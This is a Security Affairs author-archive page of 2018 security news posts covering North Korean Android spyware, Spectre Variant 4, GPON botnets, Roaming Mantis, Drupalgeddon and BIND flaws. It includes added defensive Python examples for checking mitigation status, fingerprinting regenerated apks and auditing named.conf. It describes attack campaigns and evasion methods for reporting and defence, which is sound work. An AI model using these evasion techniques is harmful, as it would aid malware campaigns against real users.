Author Archives: Pierluigi Paganini

North Korea-linked Sun Team APT group targets defectors with Android Malware

A North Korea-linked APT group tracked as Sun Team has targeted North Korean defectors with malicious apps that were published in the official Google Play store.

The campaign, named RedDawn by the security experts at McAfee who analyzed it, is the second operation attributed to the same APT group this year.

Experts noted that this is the first time the group has abused the legitimate Google Play Store as a distribution channel. In a previous campaign spotted in January, a group of North Korean defectors and journalists was targeted via social networks, email, and chat apps.

Researchers at McAfee found that the malicious apps were listed on Google Play as ‘unreleased’ versions and account for only around 100 infections. They notified Google, which has already removed them from the store.

Once installed, the malware starts copying sensitive information from the device, including personal photos, contacts, and SMS messages, and then sends them to the threat actors.

McAfee found that the hackers managed to upload three applications to Google Play; the attribution rests on the email accounts and Android devices used in the previous attack. The apps are Food Ingredients Info, Fast AppLock, and AppLockFree, and they stayed on Google Play for about two months before being removed.

“Our recent discovery of the campaign we have named RedDawn on Google Play just a few weeks after the release of our report proves that targeted attacks on mobile devices are here to stay.” reads the post published by the security firm.

“We found three apps uploaded by the actor we named Sun Team, based on email accounts and Android devices used in the previous attack.”

The first app, 음식궁합 (Food Ingredients Info), provides information about food; the other two, Fast AppLock and AppLockFree, pose as security applications.

While 음식궁합 and Fast AppLock are data stealers that receive commands and additional executable (.dex) files from a cloud control server, AppLockFree is reconnaissance malware that prepares the infected device for further payloads.

The actor promoted 음식궁합 through a fake Facebook profile, asking the profile’s friends to install the app and provide feedback.

“After infecting a device, the malware uses Dropbox and Yandex to upload data and issue commands, including additional plug-in dex files; this is a similar tactic to earlier Sun Team attacks.” continues the report.  “From these cloud storage sites, we found information logs from the same test Android devices that Sun Team used for the malware campaign we reported in January,”

The logs collected by the malicious apps resemble logs previously associated with the Sun Team group, and in an apparent opsec failure, the developer email addresses tied to the malware are ones already linked to the North Korean group.

Of course, we cannot exclude that this is an intentional false flag designed to make attribution harder.

The malware used in this campaign has been active since at least 2017; researchers observed numerous versions of the same code.

The threat actors are not native South Koreans, but they are familiar with the culture and language.

“In the new malware on Google Play, we again see that the Korean writing in the description is awkward. As in the previous operation, the Dropbox account name follows a similar pattern of using names of celebrities, such as Jack Black, who appeared on Korean TV.” continues the analysis published by McAfee.

“These features are strong evidence that the actors behind these campaigns are not native South Koreans but are familiar with the culture and language. These elements are suggestive though not a confirmation of the nationality of the actors behind these malware campaigns.”

The attackers tested their malware on several mobile devices, and the exploit code found in their cloud storage consisted of modified “versions of publicly available sandbox escape, privilege escalation, code execution exploits.”

Some of the exploits were modified by the attackers, but experts believe the developers are currently not skilled enough to develop their own zero-day exploits.

The Sun Team hackers were observed creating fake accounts using photos from social networks and the identities of South Koreans. In addition to stealing identities, the hackers are using texting and calling services to generate virtual phone numbers that allow them to sign up for online services in South Korea.

Pierluigi Paganini

(Security Affairs – Sun Team APT, malware)

The post North Korea-linked Sun Team APT group targets defectors with Android Malware appeared first on Security Affairs.

Tech giants are all working on new Spectre and Meltdown attacks, so-called Variant 3a and Variant 4

Yesterday AMD, ARM, IBM, Intel, Microsoft and other major tech firms released updates, mitigations and published security advisories for two new variants of Meltdown and Spectre attacks.

Spectre and Meltdown are back in the headlines. A few days after the disclosure of a new attack technique that allowed a group of researchers to recover data from System Management Mode (SMM) memory, IT giants have released security updates and mitigations for two new variants of the speculative execution attacks.

Let’s recap the two flaws:

The Meltdown and Spectre attacks can be exploited to bypass memory isolation mechanisms and access sensitive data.

The Meltdown attack can allow attackers to read the entire physical memory of the target machine, stealing credentials, personal information, and more.

Meltdown exploits speculative execution to breach the isolation between user applications and the operating system; in this way any application can read all system memory.

The Spectre attack allows user-mode applications to extract information from other processes running on the same system. It can also be exploited to extract information from within the victim’s own process via untrusted code: for example, malicious JavaScript can be used to extract login cookies for other sites from the browser’s memory.

Spectre breaks the isolation between different applications, allowing information to leak from the kernel to user programs, as well as from virtualization hypervisors to guest systems.

Meltdown attacks exploit CVE-2017-5754, while Spectre attacks exploit CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2). According to the experts, only Meltdown and Spectre Variant 1 can be addressed via software alone, while Spectre Variant 2 requires a microcode update for the affected processors. Software mitigations include.

In February, white hat hackers at Google Project Zero and Microsoft discovered a new attack, dubbed Variant 4 (CVE-2018-3639).

In May, a German website revealed that Intel and other vendors had been working on security updates for a new set of eight Spectre vulnerabilities, so-called “Spectre-NG.”

The eight Spectre-NG vulnerabilities in Intel CPUs also affect some ARM processors. At the time of writing, the researchers had disclosed only partial details to the German computer magazine Heise, while experts speculated that the flaws were very dangerous because they are easier to exploit.

Both CERT/CC and US-CERT also published security advisories to warn of the new side-channel attacks.

Intel has already developed microcode that addresses both Variant 3a and Variant 4 and has distributed beta versions to OEMs and operating system vendors. The company plans to deliver BIOS and software updates to its customers in the coming weeks.

“We’ve already delivered the microcode update for Variant 4 in beta form to OEM system manufacturers and system software vendors, and we expect it will be released into production BIOS and software updates over the coming weeks.” reads the advisory published by Intel. “This mitigation will be set to off-by-default, providing customers the choice of whether to enable it. We expect most industry software partners will likewise use the default-off option. In this configuration, we have observed no performance impact. If enabled, we’ve observed a performance impact of approximately 2 to 8 percent based on overall scores for benchmarks like SYSmark® 2014 SE and SPEC integer rate on client and server test systems.”

The bad news is that, once the mitigation is enabled, it degrades performance.
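Because the Variant 4 microcode mitigation ships off by default, a host's patch state cannot be read off its package versions alone; the kernel has to be asked. The following is an added example written for this page, not code from the Security Affairs post or from any vendor advisory. It reads the Linux kernel's per-vulnerability status files under /sys/devices/system/cpu/vulnerabilities (the spec_store_bypass entry appeared with the Variant 4 kernel patches, so older kernels simply lack the file, which the code treats as "unknown, assume exposed"). The status strings in SAMPLE are constructed to look like that interface's output.

```python
"""Added example: classify Linux speculative-execution mitigation status for
Meltdown, Spectre v1/v2 and Variant 4 (Speculative Store Bypass).

Assumption: a kernel that exposes /sys/devices/system/cpu/vulnerabilities/<name>
(Linux 4.17 and distributions that backported the Variant 4 patches).
"""

import os
from typing import Dict

# sysfs entry name -> the attack it reports on.
ENTRIES = {
    "meltdown": "CVE-2017-5754 (Meltdown)",
    "spectre_v1": "CVE-2017-5753 (Spectre Variant 1)",
    "spectre_v2": "CVE-2017-5715 (Spectre Variant 2)",
    "spec_store_bypass": "CVE-2018-3639 (Variant 4, Speculative Store Bypass)",
}


def classify(status: str) -> str:
    """Map one raw status line onto not_affected / mitigated / vulnerable."""
    s = status.strip()
    if s.startswith("Not affected"):
        return "not_affected"
    if s.startswith("Mitigation:"):
        return "mitigated"
    # "Vulnerable", "Vulnerable: ..." and anything unrecognised (including a
    # kernel too old to report the entry) is treated as exposed.
    return "vulnerable"


def read_sysfs(root: str = "/sys/devices/system/cpu/vulnerabilities") -> Dict[str, str]:
    """Read every known entry; a missing file means the kernel predates the check."""
    out = {}
    for name in ENTRIES:
        try:
            with open(os.path.join(root, name)) as fh:
                out[name] = fh.read()
        except OSError:
            out[name] = "Unknown (kernel does not report this entry)"
    return out


def exposed(statuses: Dict[str, str]) -> Dict[str, str]:
    """Return only the entries that are still vulnerable (or unreported)."""
    return {n: ENTRIES[n] for n, st in statuses.items() if classify(st) == "vulnerable"}


# Constructed sample: Meltdown and Spectre v1/v2 mitigated, but the Variant 4
# fix is not active (e.g. the CPU microcode lacks SSBD or it is left disabled),
# which is exactly the "off by default" state Intel describes.
SAMPLE = {
    "meltdown": "Mitigation: PTI\n",
    "spectre_v1": "Mitigation: __user pointer sanitization\n",
    "spectre_v2": "Mitigation: Full generic retpoline, IBPB, IBRS_FW\n",
    "spec_store_bypass": "Vulnerable\n",
}

if __name__ == "__main__":
    for name, st in read_sysfs().items():
        print(f"{name:18s} {classify(st):13s} {st.strip()}")
```

Run on a real host it prints one line per entry; exposed() is what a fleet inventory job would keep. Note that a "Mitigation:" line for spec_store_bypass only means the kernel can apply SSBD; on Linux the per-process control is opt-in via prctl/seccomp, so "mitigated" there still has to be read together with the exact status text.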

AMD said Variant 3a does not affect its chips, while patches for Variant 4 are expected from Microsoft and the Linux distributions.

Microsoft is still assessing its products; so far it says it is not aware of any exploitable code patterns for Variant 4 in its software or cloud infrastructure.

“However, Microsoft Edge, Internet Explorer, and other major browsers have taken steps to increase the difficulty of successfully creating a side channel.” states the security advisory published by Microsoft.

“At the time of publication, we are not aware of any exploitable code patterns of this vulnerability class in our software or cloud service infrastructure, but we are continuing to investigate. Microsoft will implement the following strategy to mitigate Speculative Store Bypass.”

As for Variant 3a, Microsoft explained that the only way to mitigate the issue is through a microcode/firmware update, not an operating system update.

IBM has released security patches for both firmware and OS to address Variant 4 in its Power Systems series.

“In May 2018, a fourth variant was identified, CVE-2018-3639. This variant is another instantiation of a side-channel information disclosure attack.” reads the advisory published by IBM.

“Mitigation of these vulnerabilities for Power Systems clients involves installing patches to both system firmware and operating systems. Both the firmware and OS patches are required for the mitigation to be effective against these vulnerabilities and the latest firmware and OS patches incorporate mitigations for the fourth variant.”

Other tech giants published security advisories for the new variants of the Spectre and Meltdown attacks, including Cisco, Oracle, Red Hat, SUSE, Ubuntu, and VMware.

Pierluigi Paganini

(Security Affairs – Intel, Spectre and Meltdown)

The post Tech giants are all working on new Spectre and Meltdown attacks, so-called Variant 3a and Variant 4 appeared first on Security Affairs.

TheMoon botnet is now leveraging a zero-day to target GPON routers

Security experts from Qihoo 360 Netlab discovered that the operators behind the TheMoon botnet are now leveraging a zero-day exploit to target GPON routers.

Researchers from security firm Qihoo 360 Netlab report that cybercriminals continue to target Dasan GPON routers: they recently spotted threat actors using another new zero-day flaw affecting the same routers to recruit them into their botnet.

At the time of writing there are no further details on the vulnerability exploited in the wild; Qihoo 360 Netlab only confirmed that the exploit code it tested worked on two models of GPON routers.

The security firm has declined to release further details on the flaw to prevent more attacks, but said it was able to reproduce its effects.

Experts discovered that the operators behind the TheMoon botnet are now leveraging the zero-day exploit to target GPON routers. TheMoon botnet was first spotted in 2014, and since 2017 its operators have added at least six IoT device exploits to the bot’s code.

“A very special thing about this round is the attacking payload. It is different from all previous ones, so it looks like a 0day.” reads the analysis published by Netlab.

“And we tested this payload on two different versions of GPON home router, all work. All these make TheMoon totally different, and we chose NOT to disclose the attack payload details.”

TheMoon isn’t the only botnet targeting Dasan GPON routers: in a previous analysis, Netlab confirmed that the Hajime, Mettle, Mirai, Muhstik, and Satori botnets have been exploiting CVE-2018-10561 and CVE-2018-10562 against the same models.

Netlab along with other security firms have managed to take down the C&C servers of the Muhstik botnet.

Although a large number of GPON routers are exposed online, only 240,000 have been compromised, likely because the exploit code used by the attackers was not able to infect the devices reliably.

Experts warn that the number of infected GPON routers could rapidly increase if the zero-day is picked up by other threat actors.

Pierluigi Paganini

(Security Affairs – GPON routers, botnet)

The post TheMoon botnet is now leveraging a zero-day to target GPON routers appeared first on Security Affairs.

Roaming Mantis gang evolves and broadens its operations

Roaming Mantis malware, which initially targeted Android devices, has now broadened both its geographic range and its targets.

Security experts from Kaspersky Lab discovered that the operators behind the Roaming Mantis campaign continue to improve their malware, broadening their targets, their geographic range and their functional scope.

Roaming Mantis surfaced in March 2018 when hacked routers in Japan started redirecting users to compromised websites. Kaspersky Lab’s investigation indicated that the attack targeted users in Asia with fake websites localized for English, Korean, Simplified Chinese and Japanese. Most affected users were in Bangladesh, Japan, and South Korea.

“Our research revealed that the malware (sic) contains Android application IDs for popular mobile banking and game applications in South Korea. The malware is most prevalent in South Korea, and Korean is the first language targeted in HTML and test.dex. Based on our findings, it appears the malicious app was originally distributed to South Korean targets. Support was then added for Traditional Chinese, English, and Japanese, broadening its target base in the Asian region.”

The DNS hijacking malware was originally designed to steal users’ login credentials and two-factor authentication codes from Android devices; it has since evolved and was recently spotted targeting iOS devices as well as desktop users.

“In April 2018, Kaspersky Lab published a blog post titled ‘Roaming Mantis uses DNS hijacking to infect Android smartphones’. Roaming Mantis uses Android malware which is designed to spread via DNS hijacking and targets Android devices.” reads the analysis published by Kaspersky.

“In May, while monitoring Roaming Mantis, aka MoqHao and XLoader, we observed significant changes in their M.O. The group’s activity expanded geographically and they broadened their attack/evasion methods. Their landing pages and malicious apk files now support 27 languages covering Europe and the Middle East. In addition, the criminals added a phishing option for iOS devices, and crypto-mining capabilities for the PC.”

The operators behind the Roaming Mantis malware recently added support for 27 languages to broaden their operations.

The new versions of the Roaming Mantis malware are still spread via DNS hijacking: the attackers use rogue websites to serve fake apps laced with banking malware to Android users, phishing sites to iOS users, and redirect PC users to websites hosting a cryptocurrency mining script.

To evade detection, the malicious websites used in the campaign generate new packages in real time for every download.

“Aside from the filename, we also observed that all the downloaded malicious apk files are unique due to package generation in real time as of May 16, 2018. It seems the actor added automatic generation of apk per download to avoid blacklisting by file hashes.” continues the analysis.

“This is a new feature. According to our monitoring, the apk samples downloaded on May 8, 2018 were all the same.”
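Per-download regeneration matters to defenders because it invalidates the cheapest detection there is, a list of file hashes. The block below is an added example written for this page, not code from Kaspersky or from the actor; it shows why whole-file hashing fails against such samples and one response, fingerprinting only the payload entries (AndroidManifest.xml and classes.dex) inside the ZIP container that an apk is. The "apks" it builds are constructed toy ZIP archives: the entry names are the standard ones, their contents are placeholders.

```python
"""Added example: whole-file hash vs. payload fingerprint for apks that are
regenerated on every download.  Archives and payload bytes are constructed."""

import hashlib
import io
import zipfile

# Entries the actor has no reason to change between downloads of the same build.
PAYLOAD_ENTRIES = ("AndroidManifest.xml", "classes.dex")

# Constructed stand-ins for the real binary-XML manifest and dex code.
MANIFEST_PLACEHOLDER = b"<manifest package='com.example.placeholder'/>"
DEX_PLACEHOLDER = b"dex\n035\x00" + bytes(range(64))


def build_apk(nonce: bytes, dex: bytes = DEX_PLACEHOLDER) -> bytes:
    """Mimic the server side: identical payload plus a junk entry that differs per download."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AndroidManifest.xml", MANIFEST_PLACEHOLDER)
        z.writestr("classes.dex", dex)
        # The per-download junk: a differently named asset with different bytes.
        z.writestr("assets/%s.bin" % nonce.hex(), nonce)
    return buf.getvalue()


def file_sha256(blob: bytes) -> str:
    """The whole-file hash a blacklist would store."""
    return hashlib.sha256(blob).hexdigest()


def payload_fingerprint(blob: bytes) -> str:
    """Hash only the payload entries, in a fixed order and length-prefixed, so junk
    entries, entry order and ZIP metadata (timestamps, compression) do not matter."""
    h = hashlib.sha256()
    with zipfile.ZipFile(io.BytesIO(blob)) as z:
        for name in PAYLOAD_ENTRIES:
            data = z.read(name)
            h.update(name.encode() + b"\x00" + len(data).to_bytes(8, "big") + data)
    return h.hexdigest()


def same_build(a: bytes, b: bytes) -> bool:
    """True when two downloads carry the same manifest and dex code."""
    return payload_fingerprint(a) == payload_fingerprint(b)


# Two "downloads" of the same malicious app, each with its own junk entry.
SAMPLE_A = build_apk(b"\x01" * 8)
SAMPLE_B = build_apk(b"\x02" * 8)

if __name__ == "__main__":
    print("whole-file hashes equal:", file_sha256(SAMPLE_A) == file_sha256(SAMPLE_B))  # False
    print("payload fingerprints equal:", same_build(SAMPLE_A, SAMPLE_B))             # True
```

The same idea carries over to real samples: a fingerprint over classes.dex (or over the dex's own method signatures) groups the May 16 downloads together, whereas file hashes never repeat. An actor can of course start mutating the dex too, at which point hashing stops being the right tool and behavioural indicators (the C2 retrieval via POP, the command set) take over.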

According to Kaspersky, the latest malicious apk implements 19 backdoor commands, including a new one, “ping”, alongside sendSms, setWifi, gcont, lock, onRecordAction, call and get_apps.

Owners of iOS devices are redirected to a phishing site (http://security[.]apple[.]com/) that mimics the Apple website in the attempt of stealing user credentials and financial data (user ID, password, card number, card expiration date and CVV number).

The Roaming Mantis operators have also started targeting PC platforms: users are redirected to websites running the Coinhive web miner script.

The sophistication of the operations and the rapid growth of the campaign lead the researchers to believe that the group is strongly financially motivated and well-funded.

“The evasion techniques used by Roaming Mantis have also become more sophisticated. Several examples of recent additions described in this post include a new method of retrieving the C2 by using the email POP protocol, server side dynamic auto-generation of changing apk file/filenames, and the inclusion of an additional command to potentially assist in identifying research environments, have all been added.” concludes Kaspersky.
“The rapid growth of the campaign implies that those behind it have a strong financial motivation and are probably well-funded.”

Further details, including IoCs are available in the report published by Kaspersky.

Pierluigi Paganini

(Security Affairs – Roaming Mantis, cybercrime)

The post Roaming Mantis gang evolves and broadens its operations appeared first on Security Affairs.

Google awarded a young expert a total of $36,337 for an RCE in the Google App Engine

Google awarded the 18-year-old student Ezequiel Pereira a total of $36,337 for the discovery of a critical remote code execution vulnerability that affected the Google App Engine.

The Google App Engine is a framework that allows Google users to develop and host web applications on a fully managed serverless platform.

In February, Pereira gained access to a non-production Google App Engine development environment and discovered that it was possible to call some of Google’s internal APIs.

Pereira responsibly reported the issue through Google’s Vulnerability Reward Program (VRP). Google’s experts ranked the flaw as P1 priority, a level assigned to vulnerabilities that could have a significant impact on a large number of users and must therefore be addressed as soon as possible.

Meanwhile, Pereira continued his tests and submitted a second report to Google after discovering further issues; Google then asked him to stop, since he could “easily break something using these internal APIs.”

Google’s security team determined that the flaw reported by the young researcher could lead to remote code execution.

Pereira published a detailed analysis of his findings after Google had fixed them and awarded him.

“In early 2018 I got access to a non-production Google App Engine deployment environment, where I could use internal APIs and it was considered as Remote Code Execution due to the way Google works. Thanks to this I got a reward of $36,337 as part of Google Vulnerability Rewards Program.” reads the blog post published by the researcher.

“Some time ago, I noticed every Google App Engine (GAE) application replied to every HTTP request with a “X-Cloud-Trace-Context” header, so I assumed any website returning that header is probably running on GAE.
Thanks to that, I learned “appengine.google.com” itself runs on GAE, but it can perform some actions that cannot be done anywhere else and common user applications cannot perform, so I tried to discover how it was able to do those actions.
Obviously, it has to make use of some API, interface or something only available to applications ran by Google itself, but maybe there was a way to access them, and I looked for that.”

Below the timeline for the flaw:

  • February 2018: Issue found
  • February 25th, 2018: Initial report (Only the “stubby” API)
  • March 4th and 5th, 2018: The “app_config_service” API discovered and reported
  • March between 6th and 13th, 2018: The access to non-prod GAE environments was blocked with a 429 error page
  • March 13th, 2018: Reward of $36,337 issued
  • May 16th, 2018: Issue confirmed as fixed

Pierluigi Paganini

(Security Affairs – Google App Engine, remote code execution flaw)

The post Google awarded a young expert a total of $36,337 for an RCE in the Google App Engine appeared first on Security Affairs.

Hacked Drupal sites involved in mining campaigns, RATs distributions, scams

Crooks are exploiting known vulnerabilities in the popular Drupal CMS such as Drupalgeddon2 and Drupalgeddon3 to deliver cryptocurrency miners, remote administration tools (RATs) and tech support scams.

Security experts at Malwarebytes reported that compromised Drupal websites are used to deliver cryptocurrency miners, remote administration tools (RATs) and tech support scams.

The two remote code execution vulnerabilities, tracked as CVE-2018-7600 and CVE-2018-7602, have already been fixed by the Drupal developers.

At the end of March, the Drupal Security Team confirmed that a “highly critical” vulnerability (dubbed Drupalgeddon2), tracked as CVE-2018-7600, was affecting Drupal 7 and 8 core and announced the availability of security updates on March 28th.

The vulnerability was discovered by the Drupal developer Jasper Mattsson.

Both Drupal 8.3.x and 8.4.x are no longer supported, but due to the severity of the flaw the Drupal Security Team decided to address it with dedicated security updates; experts called it Drupalgeddon2.

The development team released the security update for CVE-2018-7600 as scheduled.

A week after the release of the security update, experts at security firm Check Point, together with Drupal experts at Dofinity, analyzed the Drupalgeddon2 vulnerability and published a technical report on the flaw.

After the publication of the report, the researcher Vitalii Rudnykh shared a working Proof-of-Concept for Drupalgeddon2 on GitHub for “educational or information purposes.”

Immediately after the disclosure of the PoC, security experts started observing bad actors attempting to exploit the flaw.

Other security firms observed threat actors exploiting the flaw to install malware on vulnerable websites, mainly cryptocurrency miners.

The experts at the SANS Internet Storm Center reported several attacks delivering a cryptocurrency miner, a PHP backdoor, and an IRC bot written in Perl.

At the end of April, the Drupal team fixed a new highly critical remote code execution issue (dubbed Drupalgeddon3), tracked as CVE-2018-7602, with the release of versions 7.59, 8.4.8 and 8.5.3.

In this case too, cybercriminals started exploiting CVE-2018-7602 to hijack servers and install cryptocurrency miners.

The experts from Malwarebytes analyzed attacks involving Drupalgeddon2 and Drupalgeddon3 and found that almost half of the compromised Drupal sites had been running version 7.5.x, while roughly 30 percent had been running version 7.3.x, which was last updated in August 2015.

“Almost half the sites we flagged as compromised were running Drupal version 7.5.x, while version 7.3.x still represented about 30 percent, a fairly high number considering it was last updated in August 2015. Many security flaws have been discovered (and exploited) since then.” reads the analysis published by Malwarebytes.

More than 80 percent of the compromised websites had been injected with web cryptocurrency miners; Coinhive injections remain by far the most popular choice, followed by public or private Monero pools.

“We collected different types of code injection, from simple and clear text to long obfuscated blurbs. It’s worth noting that in many cases the code is dynamic—most likely a technique to evade detection,” continues the report.

Roughly 12 percent of the attacks delivered RATs or password stealers disguised as web browser updates, while tech support scams accounted for nearly 7 percent of the client-side attacks.

Pierluigi Paganini

(Security Affairs – Drupalgeddon, hacking)

The post Hacked Drupal sites involved in mining campaigns, RATs distributions, scams appeared first on Security Affairs.

Internet Systems Consortium rolled out security updates to address 2 flaws in BIND DNS Software

On Friday, the Internet Systems Consortium (ISC) announced security updates for BIND DNS software that address two vulnerabilities rated with a “medium” severity rating.

Both vulnerabilities can be exploited by attackers to cause a denial-of-service (DoS) condition; the first issue, tracked as CVE-2018-5737, can also cause severe operational problems such as service degradation.

“A problem with the implementation of the new serve-stale feature in BIND 9.12 can lead to an assertion failure in rbtdb.c, even when stale-answer-enable is off.  Additionally, problematic interaction between the serve-stale feature and NSEC aggressive negative caching can in some cases cause undesirable behavior from named, such as a recursion loop or excessive logging.” reads the security advisory published by the ISC.

“Deliberate exploitation of this condition could cause operational problems depending on the particular manifestation — either degradation or denial of service.” 

Servers running BIND 9.12.0 and 9.12.1 which permit recursion to clients and have the max-stale-ttl parameter set to a non-zero value are at risk.

The Internet Systems Consortium (ISC) has addressed the flaw with the release of BIND 9.12.1-P2. Below is the workaround provided by the organization:

  • Setting “max-stale-ttl 0;” in named.conf will prevent exploitation of this vulnerability (but will effectively disable the serve-stale feature.)
  • Setting “stale-answer-enable off;” is not sufficient to prevent exploitation; max-stale-ttl needs to be set to zero.
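The second bullet is the one that gets missed in practice: turning off stale answers looks like it should be enough, and it is not. The block below is an added example written for this page, not part of the ISC advisory, that turns the workaround into a check over a named.conf options block: a server is exposed to CVE-2018-5737 when it runs 9.12.0 or 9.12.1, permits recursion, and has a non-zero max-stale-ttl, regardless of stale-answer-enable. Parsing is a line-oriented regex over top-level options, not a full named.conf grammar; the sample configurations are constructed. One assumption to flag: when max-stale-ttl is absent the code uses BIND 9.12's documented default of one week, which is non-zero and therefore counts as exposed.

```python
"""Added example: flag named.conf configurations exposed to CVE-2018-5737
(BIND 9.12 serve-stale assertion failure) per the ISC workaround."""

import re
from typing import Optional, Tuple

# Affected releases; 9.12.1-P2 carries the fix (9.12.1-P1 fixed only CVE-2018-5736).
AFFECTED = {(9, 12, 0), (9, 12, 1)}

DEFAULT_MAX_STALE_TTL = 7 * 24 * 3600   # assumption: 9.12 default of 1 week

DURATION_UNITS = {"": 1, "s": 1, "m": 60, "h": 3600, "d": 86400, "w": 604800}


def option(conf: str, name: str) -> Optional[str]:
    """Return the value of an option statement such as 'max-stale-ttl 3600;'.
    If it appears more than once the last occurrence wins, as in named itself."""
    vals = re.findall(r"(?m)^\s*%s\s+([^;]+);" % re.escape(name), conf)
    return vals[-1].strip() if vals else None


def parse_ttl(value: Optional[str]) -> int:
    """max-stale-ttl is a duration: plain seconds or a number with an s/m/h/d/w suffix."""
    if value is None:
        return DEFAULT_MAX_STALE_TTL
    m = re.fullmatch(r"(\d+)\s*([smhdw]?)", value, re.I)
    if not m:
        raise ValueError("unparseable duration: %r" % value)
    return int(m.group(1)) * DURATION_UNITS[m.group(2).lower()]


def exposed_to_cve_2018_5737(version: Tuple[int, int, int], conf: str) -> Tuple[bool, str]:
    """(exposed?, reason) for a BIND version plus the text of its named.conf."""
    if version not in AFFECTED:
        return False, "version not affected"
    if (option(conf, "recursion") or "yes").lower() == "no":
        return False, "recursion disabled"
    if parse_ttl(option(conf, "max-stale-ttl")) == 0:
        return False, "max-stale-ttl is 0 (serve-stale disabled)"
    reason = "recursion on with non-zero max-stale-ttl"
    if (option(conf, "stale-answer-enable") or "").lower() in ("no", "off", "false", "0"):
        reason += " (stale-answer-enable off is not sufficient)"
    return True, reason


# Constructed configurations: the first disables stale answers but keeps a
# non-zero max-stale-ttl; the second applies the ISC workaround.
VULN_CONF = """
options {
    directory "/var/named";
    recursion yes;
    stale-answer-enable no;
    max-stale-ttl 1h;
};
"""
SAFE_CONF = VULN_CONF.replace("max-stale-ttl 1h;", "max-stale-ttl 0;")

if __name__ == "__main__":
    for label, conf in (("vulnerable", VULN_CONF), ("workaround", SAFE_CONF)):
        print(label, exposed_to_cve_2018_5737((9, 12, 1), conf))
```

Because the default is non-zero, an affected resolver with no max-stale-ttl line at all is flagged too, which matches the advisory's wording. For CVE-2018-5736 the analogous configuration check is who may send NOTIFY (allow-notify) to the slave zones, but the real answer for both is the 9.12.1-P2 upgrade.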

The second flaw, tracked as CVE-2018-5736, is remotely exploitable if the attacker can trigger a zone transfer.

“An error in zone database reference counting can lead to an assertion failure if a server which is running an affected version of BIND attempts several transfers of a slave zone in quick succession,” states the advisory published by the ISC.

“This defect could be deliberately exercised by an attacker who is permitted to cause a vulnerable server to initiate zone transfers (for example: by sending valid NOTIFY messages), causing the named process to exit after failing the assertion test.”

CVE-2018-5736 affects BIND 9.12.0 and 9.12.1; ISC addressed it with the release of version 9.12.1-P1. Admins should nevertheless update to version 9.12.1-P2, which also addresses CVE-2018-5737.

This is the third time this year that ISC has released security updates for its software. The first updates were released in January to address a high-severity vulnerability that could crash DNS servers.

The second set was released in February to address remotely exploitable vulnerabilities in ISC’s DHCP software.

Pierluigi Paganini

(Security Affairs – BIND DNS software, DoS)

The post Internet Systems Consortium rolled out security updates to address 2 flaws in BIND DNS Software appeared first on Security Affairs.



Judges convict crook of operating Scan4You Counter Antivirus Service

The crook faces up to 35 years in prison for operating the popular Scan4You counter antivirus (CAV) service, which helped malware authors test the evasion capabilities of their code.

Scan4You was a familiar service for malware developers, who used it as a counter antivirus (CAV) scanner.

Scan4You allowed malware writers (vxers) to check their samples against as many as 40 antivirus products.

Scan4You was probably the largest counter antivirus service; it went offline in May 2017 after authorities arrested two men in Latvia: the Russian national Jurijs Martisevs (36), aka “Garrik”, and Ruslans Bondars (37), aka “Borland”.

Both suspects were extradited to the United States at the FBI’s request.

Jurijs Martisevs was traveling to Latvia when he was arrested by authorities, and in March he pleaded guilty in a Virginia court to charges of conspiracy and aiding and abetting computer intrusion.

On Wednesday, Bondars was found guilty of conspiracy to violate the Computer Fraud and Abuse Act, conspiracy to commit wire fraud, and computer intrusion with intent to cause damage.

“Ruslans Bondars helped hackers test and improve the malware they then used to inflict hundreds of millions of dollars in losses on American companies and consumers,” said John P. Cronan, Acting Assistant Attorney General of the Justice Department’s Criminal Division.

“Today’s verdict should serve as a warning to those who aid and abet criminal hackers: the Criminal Division and our law enforcement partners consider you to be just as culpable as the hackers whose crimes you enable—and we will work tirelessly to identify you, prosecute you, and seek stiff sentences that reflect the seriousness of your crimes.”

Bondars faces a maximum penalty of 35 years in prison when sentenced on September 21, 2018.

Scan4You was launched in 2009 to offer a service that let malware developers check the evasion capabilities of their code.

For a monthly fee, malware authors could upload their samples to the service, which tested them against a broad range of anti-virus products.

The service is similar to the legitimate VirusTotal, with the difference that Scan4You did not share submissions with the security community.

“Scan4you differed from legitimate antivirus scanning services in multiple ways. For example, while legitimate scanning services share data about uploaded files with the antivirus community and notify their users that they will do so, Scan4you instead informed its users that they could upload files anonymously and promised not to share information about the uploaded files with the antivirus community.” continues the DoJ.

According to the DoJ, crooks used Scan4You’s services to test the infamous Citadel malware that was used in the cyber attack against the retail giant Target.

Even though Scan4You was taken offline, crooks have other ways to test their malware before spreading it in the wild. Law enforcement must remain vigilant to prevent the growth of similar services.

Pierluigi Paganini

(Security Affairs – CAV, Scan4You)


Security Affairs newsletter Round 163 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online

Once again thank you!

·      A new flaw in Electron poses a risk to apps based on the framework
·      Malicious package containing Bytecoin cryptocurrency miner found on the Ubuntu Snap Store
·      UK mobile operator EE left a critical code system exposed with a default password
·      Chilis restaurant chain is the latest victim of a Payment Card Breach
·      Critical Flaws in PGP and S/MIME Tools – Immediately disable tools that automatically decrypt PGP-encrypted email
·      Nigelthorn malware infected over 100,000 systems abusing Chrome extensions
·      PANDA Banker malware used in several campaigns aimed at banks, cryptocurrency exchanges and social media
·      Researchers disclosed details of EFAIL attacks on PGP and S/MIME tools. Experts believe claims are overblown
·      Adobe issued security updates for 47 vulnerabilities in Acrobat DC and Reader
·      Dutch Government plans to phase out the use of Kaspersky solutions
·      Hackers shared technical details of a Code Injection flaw in Signal App
·      Massive DDoS attack hit the Danish state rail operator DSB
·      Rail Europe North America hit by payment card data breach
·      Anonymous defaced Russia govt website against Telegram ban
·      Mysterious hackers ingenuously reveal two Zero-Days to security community
·      Operation Hotel – Ecuador spent millions on spy operation for Julian Assange
·      Red Hat Linux DHCP Client affected by a command injection flaw, patch it now!
·      Mexican central bank confirmed that SWIFT hackers stole millions of dollars from Mexican Banks
·      Nethammer – Exploiting Rowhammer attack through network without a single attacker-controlled line of code
·      Russian Telegrab malware harvesting Telegram Desktop credentials, cookies, desktop cache, and key files
·      A New Mexico man sentenced to 15 Years in jail for DDoS Attacks and possession of firearms
·      CISCO issued security updates to address three critical flaws in Cisco DNA Center
·      Satori Botnet is targeting exposed Ethereum mining pools running the Claymore mining software
·      The new Wicked Mirai botnet leverages at least three new exploits
·      A dataset of 200 million PII exfiltrated from several Japanese websites offered on underground market
·      Chrome evolves security indicators by marking with a red warning for HTTP content
